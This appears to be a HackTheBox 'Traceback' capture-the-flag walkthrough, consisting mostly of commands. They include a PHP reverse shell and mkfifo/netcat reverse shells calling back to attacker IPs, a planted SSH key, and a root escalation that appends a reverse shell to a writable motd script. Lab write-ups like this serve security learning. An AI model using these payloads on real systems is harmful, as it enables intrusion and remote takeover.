HackTheBox - Traceback | Walkthrough
Enumeration
vi /etc/hosts
10.10.10.181 traceback
nmap -A 10.10.10.181 -o traceback/nmap
ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
httpd Apache httpd 2.4.29
Google for the comment, some of the best web shells that you might need
http://traceback/smevk.php
`-> login page
admin/admin
in your attacker machine,
vi rev.php
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.86/4444 0>&1'");
Upload the file and then set up a netcat listener in your attacker machine:
nc -nvlp 4444
send a request to traceback/rev.php
You should have a reverse shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
cd ~
cat note.txt
sudo -l
You will see where the file is.
User
Now, you can execute a shell command to get a reverse shell back in your machine.
In attacker machine,
nc -nvlp 1234
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.114 1234 >/tmp/f")'
Now, you should get a reverse shell.
Now, set up a ssh way in to the machine.
In your attacker machine:
(echo "\n\n"; echo ~/.ssh/id_rsa.pub; echo "\n\n") > ~/hackthebox/traceback/www/test.txt
python -m SimpleHTTPServer
As webadmin,
cd ~/.ssh
wget http://10.10.14.114:8000/test.txt
echo test.txt >> authorized_keys
rm test.txt
Root
For privesc,
ps aux | grep root
You should see that, root is copying replacing /etc/update-motd.d/ files every 30 seconds.
ls -al /etc/update-motd.d/
You can see that you have write and execute privileges in this file.
This header gets displayed everytime you ssh into this box.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.114 2345 >/tmp/f" >> /etc/update-motd.d/00-header
Now, in your attacking machine, you will need two windows.
In one, run,nc -nvlp 2345
This is so that you can catch the reverse shell that gets sent when the 00-header file runs.
In the other tab,ssh webadmin@10.10.10.181
And boom, you should get a reverse shell as root!
whoamicat ~/root.txt